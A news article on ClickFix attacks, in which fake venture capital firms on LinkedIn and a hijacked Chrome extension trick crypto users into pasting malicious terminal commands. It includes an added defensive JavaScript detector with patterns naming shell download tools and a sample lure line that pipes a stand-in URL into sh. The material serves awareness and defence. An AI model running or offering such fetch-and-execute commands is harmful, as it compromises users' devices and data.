Crypto criminals are refining social engineering tactics to bypass traditional security tools, using fake venture capital outreach to deploy a technique known as ClickFix.

Researchers say attackers are impersonating investment firms on LinkedIn, luring users into fraudulent video calls, and tricking them into running malicious commands on their own devices.

The method avoids conventional malware downloads by relying on victims to manually execute harmful code.

Alongside the fake investor campaign, a compromised Chrome extension has also been used to spread similar attacks, widening the tactic beyond direct messaging scams.

Fake VC identities

According to a report by Moonlock Lab, scammers have created fake venture capital brands including SolidBit, MegaBit, and Lumax Capital.

Attackers approach targets on LinkedIn with partnership proposals and invitations to discuss investment opportunities.

Victims are directed to what appear to be Zoom or Google Meet links.

Instead of a meeting, they land on a fraudulent event page featuring a fake Cloudflare verification step with an "I am not a robot" checkbox.

Clicking the box copies a malicious command to the clipboard. The page then instructs the user to open their computer’s terminal and paste the so-called verification code.

Once executed, the command launches the attack.

Moonlock Lab said the effectiveness of ClickFix lies in forcing the target to run the command themselves.

Because there is no suspicious file download or automatic exploit, many traditional security controls are bypassed.
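For defenders, the flow described above leaves three observable traits: the page rather than the user decides what lands on the clipboard, the clipboard text looks like a command, and the page tells the user to paste it into a terminal. The following JavaScript is an added example, not code from Moonlock Lab or the original article; the event shape, patterns and thresholds are assumptions, and the sample events are constructed.

```javascript
// Added example. Patterns and thresholds are illustrative assumptions,
// not indicators taken from the reports cited in the article.

// Wording a lure page uses to steer the user to a terminal (assumed).
const INSTRUCTION_HINTS = [
  /open (your |the )?(terminal|command prompt|powershell)/i,
  /paste (the |your )?(verification )?(code|command)/i,
  /i am not a robot/i,
];
// Shapes that make clipboard text look like a command (assumed).
const COMMAND_HINTS = [
  /\b(curl|wget|powershell|mshta|osascript|bash|sh)\b/i,
  /\|\s*(sh|bash|zsh)\b/i,       // output piped into a shell
  /https?:\/\/\S+/i,             // remote resource referenced
  /[A-Za-z0-9+\/]{40,}={0,2}/,   // long encoded-looking blob
];
const countMatches = (patterns, text) =>
  patterns.filter((re) => re.test(text)).length;

// event: hypothetical record a browser extension or endpoint sensor assembles.
function assessClipboardWrite({ clipboardText = "", userSelection = "", pageText = "" }) {
  const reasons = [];
  // 1. The page, not the user, chose what went onto the clipboard.
  if (clipboardText && clipboardText.trim() !== userSelection.trim())
    reasons.push("clipboard text differs from user selection");
  // 2. The clipboard content looks like a command.
  const cmd = countMatches(COMMAND_HINTS, clipboardText);
  if (cmd >= 2) reasons.push(`command-like content (${cmd} hints)`);
  // 3. The page tells the user to paste into a terminal.
  const ins = countMatches(INSTRUCTION_HINTS, pageText);
  if (ins >= 1) reasons.push(`paste-into-terminal instructions (${ins} hints)`);
  return { suspicious: reasons.length === 3, reasons };
}

// Constructed sample events (example.invalid is a reserved, non-resolving name).
const SAMPLE_LURE = {
  clipboardText: "curl -s https://example.invalid/verify | sh",
  userSelection: "",
  pageText: "I am not a robot. Open your terminal and paste the verification code.",
};
const SAMPLE_BENIGN = {
  clipboardText: "npm install left-pad",
  userSelection: "npm install left-pad",
  pageText: "Installation: add the package to your project.",
};

console.log(assessClipboardWrite(SAMPLE_LURE));
console.log(assessClipboardWrite(SAMPLE_BENIGN));
```

Legitimate documentation with a "copy install command" button can match all three traits, so a hit is better used to warn the user or raise an alert for review than to block outright.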

The firm alleged that an individual using the name Mykhailo Hureiev, presented as co-founder and managing partner at SolidBit Capital, acted as a primary contact during the LinkedIn outreach stage.

Chrome extension compromise

In a separate development, hackers used a similar ClickFix angle through a compromised Chrome extension.

QuickLens, an extension allowing users to run Google Lens searches directly in their browser, was removed from the Chrome Web Store after it was found pushing malicious scripts.

John Tuckner, founder of Annex Security, said in a Feb. 23 report that QuickLens changed ownership on Feb. 1.

Two weeks later, an updated version was released containing scripts that launched ClickFix attacks and other information-stealing tools.

Around 7,000 users had installed the extension.

A March 2 report by eSecurity Planet stated that the hijacked extension searched for crypto wallet data and seed phrases to steal funds.

It also scraped Gmail inbox contents, YouTube channel data, login credentials, and payment information entered into web forms.

Wider industry impact

Moonlock Lab said ClickFix attacks have gained popularity since last year because they compel victims to execute the malicious payload manually, allowing attackers to sidestep many automated detection systems.

Researchers have tracked the method since at least 2024.

Microsoft Threat Intelligence warned in August that it observed campaigns targeting thousands of enterprise and end-user devices globally each day.

In July, Unit 42 reported that the relatively new social engineering technique affected the manufacturing, wholesale and retail, state and local government, and utilities and energy sectors.

The post Crypto hackers exploit ClickFix via fake venture capital outreach appeared first on Invezz